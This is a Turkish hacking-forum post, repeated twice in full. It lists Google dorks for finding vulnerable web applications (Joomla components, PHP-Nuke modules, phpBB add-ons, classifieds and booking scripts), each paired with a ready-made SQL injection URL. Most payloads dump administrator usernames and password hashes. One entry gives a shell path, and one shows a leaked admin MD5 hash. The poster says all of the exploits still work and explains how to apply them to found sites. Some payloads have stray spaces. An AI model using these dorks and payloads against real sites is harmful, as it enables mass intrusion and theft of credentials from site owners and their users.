------------------------------------------------
Kmita Tell Friend Açığı
Dork: "Powered by Kmita Tell Friend" veya "allinurl:/kmitat/"
Exploit: /kmitaadmin/kmitat/htmlcode.php?file=shell?
Yöntemi: Shell
Panele yönlendirir.
------------------------------------------------
View-F** Açığı
Dork: Google : "allinurl:viewf**s.php?cat="
Exploide:
/viewf**s.php?cat=-1%20union%20select%20concat(id,0x3a,username,0x3a, password)%20from PHPAUCTIONXL_adminusers--
------------------------------------------------
Days-Booking Açığı
Dork: "allinurl:index.php?user=daysbooking"
Exploid: index.php?pid=-1%20union%20select%201,concat(id,0x3a,user,0x3a,pa ssword,0x3a,access,0x3a,email),3,4,5,6,7,8,9,0,1,2 ,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7 ,8,9,0,1,2%20from%20admin--&user=det
------------------------------------------------
Pn-Encyclopedia Açığı
Dork: allinurl:index.php?module=pnEncyclopedia
Exploide (1-2)
1- index.php?module=pnEncyclopedia&func=display_term& id=9999 union select 1,2,3,4,5,6,version(),8,9,10,11--
2- index.php?module=pnEncyclopedia&func=display_term& id=9999 union select 1,2,3,4,5,6,load_file
------------------------------------------------
ASPapp KnowledgeBase Açığı
Dork 1 - content_by_cat.asp?contentid ''catid''
Dork 2 - content_by_cat.asp? ''catid''
exploit-
content_by_cat.asp?contentid=99999999&catid=-99887766+UNION+SELECT+0,null,password,3,accessleve l,5,null,7,null,user_name+from+users
content_by_cat.asp?contentid=-99999999&catid=-99887766+union+select+0,null,password,3,accessleve l,5,null,7,8,user_name+from+users
------------------------------------------------
EmagiC CMS.Net v4.0 Açığı
Dork : inurl:emc.asp?pageid=
Exploit:
emc.asp?pageId=1' UNION SELECT TOP 1 convert(int, password%2b'%20x') FROM EMAGIC_LOGINS where username="'sa'--
------------------------------------------------
PHP-Nuke Siir Açığı
DORK 1 : allinurl:"modules.php?name"print
DORK 2 : allinurl:"modules.php?name="Hikaye"
DORK 3: allinurl:"modules.php?name="Fikralar"
DORK 4: allinurl:"modules.php?name="bilgi"
EXPLOIT :
print&id=-9999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/0,aid,0x3a,pwd,4/**/from+nuke_authors/*where%20admin%201%200%202
------------------------------------------------
Rmsoft GS 2.0 Açığı
Dork: intext
owered by RMSOFT GS 2.0 veya inurl:modules/rmgs/images.php
Exploit:
modules/rmgs/images.php?q=user&id=1999/**/union/**/all/**/select/**/1,1,concat(database(),0x202D20,user()),1,1,1,1,0,1 ,0,1,0,1,1,0,0,0,0,0,1,1,0,0,0,1,1,1,0,1,0,0/*
------------------------------------------------
Com-Na-Xxx Açığı
DORK 1 : allinurl:"com_na_content"
DORK 2 : allinurl:"com_na_bible"
DORK 3 : allinurl:"com_na_events"
DORK 4 : allinurl:"com_na_content"
DORK 5 : allinurl:"com_na_feedback"
DORK 6 : allinurl:"com_na_mydocs"
DORK 7 : allinurl:"com_na_churchmap"
DORK 8 : allinurl:"com_na_bibleinfo"
DORK 9 : allinurl:"com_na_dbs"
DORK 10 : allinurl:"com_na_udm"
DORK 11 : allinurl:"com_na_qforms"
DORK 12 : allinurl:"com_na_gallery2"
DORK 13 : allinurl:"com_na_publicrss"
DORK 14 : allinurl:"index.php?kwd"
EXPLOİT:
index.php?option=com_sermon&gid=-9999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/concat(username,0x3a,password),0,0,username,passwo rd%2C0%2C0%2C0/**/from/**/mos_users/*
------------------------------------------------
Com-Comments Açığı
Dork: "Review ******", "Phil Taylor"
Exploit:
index.php?option=com_comments&task=view&id=-1+UNION+SELECT+0,999999,concat(username,0x3a,PASSW ORD),0,0,0,0,0,0+FROM+mos_users+union+select+*+fro m+mos_content_comments+where+1=1
------------------------------------------------
Com-Astatspro Açığı
Dork: allinurl: "com_astatspro"
PoC: administrator/components/com_astatspro/refer.php?id=-1/**/union/**/select/**/0,concat(username,0x3a,password,0x3a,usertype),con cat(username,0x3a,password,0x3a,usertype)/**/from/**/jos_users/*
Gelen sayfada sağ tıkla kaynağı görüntüle.
<H1>302 Moved</H1>
The ******** has moved <A HREF="admin:c9cb9115e90580e14a0407ed1fcf8039:Super Administrator">here</A>.
Bu bölümde md5 saklıdır.
------------------------------------------------
Modified By Fully Açığı
DORK : allinurl :kb.php?mode=article&k
DORK : "Powered by phpBB © 2001, 2006 phpBB Group" veya "Modified by Fully Modded phpBB © 2002, 2006"
EXPLOIT :
kb.php?mode=article&k=-1+union+select+1,1,concat(user_id,char(58),usernam e,char(58),user_password),4,5,6,7,8,9,10,11,12,13+ from+phpbb_users+where+user_id+=2&page_num=2&cat=1
------------------------------------------------
Easy-Clanpage v2.2 Açığı
Dork: "Easy-Clanpage v2.2"
Example -1/**/union/**/select/**/1,2,concat(username,0x3a,password),4,5,6,7/**/from/**/ecp_user/**/where/**/userid=1/*
------------------------------------------------
BM Classifieds Açığı
Dork 1 : ''showad.php?listingid=''
Dork 2 : ''pfriendly.php?ad=''
EXPLOIT:
showad.php?listingid=xCoRpiTx&cat=-99/**/union+select/**/concat(username,0x3a,email),password,2/**/from/**/users/*
pfriendly.php?ad=-99%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0 ,1,concat(username,0x3a,email),password,4,5,6,7,8, 9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25, 26,27%2F%2A%2A%2Ffrom%2F%2A%2A%2Fusers%2F%2A%2A%2F
------------------------------------------------
Porar WebBoart Açığı
DorK : '' webboard question.asp QID''
EXPLOIT:
question.asp?QID=-1122334455%20+%20union%20+%20select%20+%200,null,2 ,username,password,5,password,7,8,9,null%20+%20fro m%20+%20+%20administrator%20';';
------------------------------------------------
Com-Noticias Açığı
DorK : ''com_noticias''
EXPLOIT: index.php?option=com_noticias&Itemid=xcorpitx&task =detalhe&id=-99887766/**/union/**/%20select/**/0,concat##(username,0x3a,password,0x3a,email),2,3, 4,5/**/%20from/**/%20jos_users/*
------------------------------------------------
Modules-Viso Açığı
DORKS 1 : allinurl :"modules/viso"
EXPLOIT 1 :
modules/viso/index.php?kid=-9999999/**/union/**/select/**/0,0x3a,uname,0x3a,0x3a,0x3a,pass/**/from/**/exv2_users/*where%20exv2_admin%201
EXPLOIT 2 :
modules/viso/index.php?kid=-9999999/**/union/**/select/**/0,0x3a,uname,0x3a,0x3a,0x3a,pass,pass/**/from/**/exv2_users/*where%20exv2_admin%201
------------------------------------------------
Bookmarkx ****** Açığı
DorK 1 : "2007 BookmarkX ******"
DORK 2 : Powered by GengoliaWebStudio
DORK 3 : allinurl :"index.php?menu=showtopic"
EXPLOIT :
index.php?menu=showtopic&topicid=-1/**/UNION/**/ALL/**/SELECT/**/1,2,concat(auser,0x3a,apass),4,5,6/**/FROM/**/admin/*%20admin=1
veya;
index.php?menu=showtopic&topicid=-1/**/UNION/**/ALL/**/SELECT/**/1,2,concat(auser,0x3a,apass),4,5,6,7/**/FROM/**/admin/*%20admin=1
------------------------------------------------
Com-Profiler Açığı
DORK: allinurl:com_comprofiler
Exploit: /index.php?option=com_comprofiler&task=userProfile& user=[SQL]
Example: /index.php?option=com_comprofiler&task=userProfile& user=1/**/and/**/mid((select/**/password/**/from/**/jos_users/**/limit/**/0,1),1,1)/**/</**/Char(97)/*
Bazıları Eski ama işe yaramayan yok.
dork:googlede aratılacak
exploid: site sonuna
example:son hali
__________________
bir teşekkürü cok gormeyin hahaha
Kmita Tell Friend Açığı
Dork: "Powered by Kmita Tell Friend" veya "allinurl:/kmitat/"
Exploit: /kmitaadmin/kmitat/htmlcode.php?file=shell?
Yöntemi: Shell
Panele yönlendirir.
------------------------------------------------
View-F** Açığı
Dork: Google : "allinurl:viewf**s.php?cat="
Exploide:
/viewf**s.php?cat=-1%20union%20select%20concat(id,0x3a,username,0x3a, password)%20from PHPAUCTIONXL_adminusers--
------------------------------------------------
Days-Booking Açığı
Dork: "allinurl:index.php?user=daysbooking"
Exploid: index.php?pid=-1%20union%20select%201,concat(id,0x3a,user,0x3a,pa ssword,0x3a,access,0x3a,email),3,4,5,6,7,8,9,0,1,2 ,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7 ,8,9,0,1,2%20from%20admin--&user=det
------------------------------------------------
Pn-Encyclopedia Açığı
Dork: allinurl:index.php?module=pnEncyclopedia
Exploide (1-2)
1- index.php?module=pnEncyclopedia&func=display_term& id=9999 union select 1,2,3,4,5,6,version(),8,9,10,11--
2- index.php?module=pnEncyclopedia&func=display_term& id=9999 union select 1,2,3,4,5,6,load_file
------------------------------------------------
ASPapp KnowledgeBase Açığı
Dork 1 - content_by_cat.asp?contentid ''catid''
Dork 2 - content_by_cat.asp? ''catid''
exploit-
content_by_cat.asp?contentid=99999999&catid=-99887766+UNION+SELECT+0,null,password,3,accessleve l,5,null,7,null,user_name+from+users
content_by_cat.asp?contentid=-99999999&catid=-99887766+union+select+0,null,password,3,accessleve l,5,null,7,8,user_name+from+users
------------------------------------------------
EmagiC CMS.Net v4.0 Açığı
Dork : inurl:emc.asp?pageid=
Exploit:
emc.asp?pageId=1' UNION SELECT TOP 1 convert(int, password%2b'%20x') FROM EMAGIC_LOGINS where username="'sa'--
------------------------------------------------
PHP-Nuke Siir Açığı
DORK 1 : allinurl:"modules.php?name"print
DORK 2 : allinurl:"modules.php?name="Hikaye"
DORK 3: allinurl:"modules.php?name="Fikralar"
DORK 4: allinurl:"modules.php?name="bilgi"
EXPLOIT :
print&id=-9999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/0,aid,0x3a,pwd,4/**/from+nuke_authors/*where%20admin%201%200%202
------------------------------------------------
Rmsoft GS 2.0 Açığı
Dork: intext
owered by RMSOFT GS 2.0 veya inurl:modules/rmgs/images.phpExploit:
modules/rmgs/images.php?q=user&id=1999/**/union/**/all/**/select/**/1,1,concat(database(),0x202D20,user()),1,1,1,1,0,1 ,0,1,0,1,1,0,0,0,0,0,1,1,0,0,0,1,1,1,0,1,0,0/*
------------------------------------------------
Com-Na-Xxx Açığı
DORK 1 : allinurl:"com_na_content"
DORK 2 : allinurl:"com_na_bible"
DORK 3 : allinurl:"com_na_events"
DORK 4 : allinurl:"com_na_content"
DORK 5 : allinurl:"com_na_feedback"
DORK 6 : allinurl:"com_na_mydocs"
DORK 7 : allinurl:"com_na_churchmap"
DORK 8 : allinurl:"com_na_bibleinfo"
DORK 9 : allinurl:"com_na_dbs"
DORK 10 : allinurl:"com_na_udm"
DORK 11 : allinurl:"com_na_qforms"
DORK 12 : allinurl:"com_na_gallery2"
DORK 13 : allinurl:"com_na_publicrss"
DORK 14 : allinurl:"index.php?kwd"
EXPLOİT:
index.php?option=com_sermon&gid=-9999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/concat(username,0x3a,password),0,0,username,passwo rd%2C0%2C0%2C0/**/from/**/mos_users/*
------------------------------------------------
Com-Comments Açığı
Dork: "Review ******", "Phil Taylor"
Exploit:
index.php?option=com_comments&task=view&id=-1+UNION+SELECT+0,999999,concat(username,0x3a,PASSW ORD),0,0,0,0,0,0+FROM+mos_users+union+select+*+fro m+mos_content_comments+where+1=1
------------------------------------------------
Com-Astatspro Açığı
Dork: allinurl: "com_astatspro"
PoC: administrator/components/com_astatspro/refer.php?id=-1/**/union/**/select/**/0,concat(username,0x3a,password,0x3a,usertype),con cat(username,0x3a,password,0x3a,usertype)/**/from/**/jos_users/*
Gelen sayfada sağ tıkla kaynağı görüntüle.
<H1>302 Moved</H1>
The ******** has moved <A HREF="admin:c9cb9115e90580e14a0407ed1fcf8039:Super Administrator">here</A>.
Bu bölümde md5 saklıdır.
------------------------------------------------
Modified By Fully Açığı
DORK : allinurl :kb.php?mode=article&k
DORK : "Powered by phpBB © 2001, 2006 phpBB Group" veya "Modified by Fully Modded phpBB © 2002, 2006"
EXPLOIT :
kb.php?mode=article&k=-1+union+select+1,1,concat(user_id,char(58),usernam e,char(58),user_password),4,5,6,7,8,9,10,11,12,13+ from+phpbb_users+where+user_id+=2&page_num=2&cat=1
------------------------------------------------
Easy-Clanpage v2.2 Açığı
Dork: "Easy-Clanpage v2.2"
Example -1/**/union/**/select/**/1,2,concat(username,0x3a,password),4,5,6,7/**/from/**/ecp_user/**/where/**/userid=1/*
------------------------------------------------
BM Classifieds Açığı
Dork 1 : ''showad.php?listingid=''
Dork 2 : ''pfriendly.php?ad=''
EXPLOIT:
showad.php?listingid=xCoRpiTx&cat=-99/**/union+select/**/concat(username,0x3a,email),password,2/**/from/**/users/*
pfriendly.php?ad=-99%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0 ,1,concat(username,0x3a,email),password,4,5,6,7,8, 9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25, 26,27%2F%2A%2A%2Ffrom%2F%2A%2A%2Fusers%2F%2A%2A%2F
------------------------------------------------
Porar WebBoart Açığı
DorK : '' webboard question.asp QID''
EXPLOIT:
question.asp?QID=-1122334455%20+%20union%20+%20select%20+%200,null,2 ,username,password,5,password,7,8,9,null%20+%20fro m%20+%20+%20administrator%20';';
------------------------------------------------
Com-Noticias Açığı
DorK : ''com_noticias''
EXPLOIT: index.php?option=com_noticias&Itemid=xcorpitx&task =detalhe&id=-99887766/**/union/**/%20select/**/0,concat##(username,0x3a,password,0x3a,email),2,3, 4,5/**/%20from/**/%20jos_users/*
------------------------------------------------
Modules-Viso Açığı
DORKS 1 : allinurl :"modules/viso"
EXPLOIT 1 :
modules/viso/index.php?kid=-9999999/**/union/**/select/**/0,0x3a,uname,0x3a,0x3a,0x3a,pass/**/from/**/exv2_users/*where%20exv2_admin%201
EXPLOIT 2 :
modules/viso/index.php?kid=-9999999/**/union/**/select/**/0,0x3a,uname,0x3a,0x3a,0x3a,pass,pass/**/from/**/exv2_users/*where%20exv2_admin%201
------------------------------------------------
Bookmarkx ****** Açığı
DorK 1 : "2007 BookmarkX ******"
DORK 2 : Powered by GengoliaWebStudio
DORK 3 : allinurl :"index.php?menu=showtopic"
EXPLOIT :
index.php?menu=showtopic&topicid=-1/**/UNION/**/ALL/**/SELECT/**/1,2,concat(auser,0x3a,apass),4,5,6/**/FROM/**/admin/*%20admin=1
veya;
index.php?menu=showtopic&topicid=-1/**/UNION/**/ALL/**/SELECT/**/1,2,concat(auser,0x3a,apass),4,5,6,7/**/FROM/**/admin/*%20admin=1
------------------------------------------------
Com-Profiler Açığı
DORK: allinurl:com_comprofiler
Exploit: /index.php?option=com_comprofiler&task=userProfile& user=[SQL]
Example: /index.php?option=com_comprofiler&task=userProfile& user=1/**/and/**/mid((select/**/password/**/from/**/jos_users/**/limit/**/0,1),1,1)/**/</**/Char(97)/*
Bazıları Eski ama işe yaramayan yok.
dork:googlede aratılacak
exploid: site sonuna
example:son hali
__________________
bir teşekkürü cok gormeyin hahaha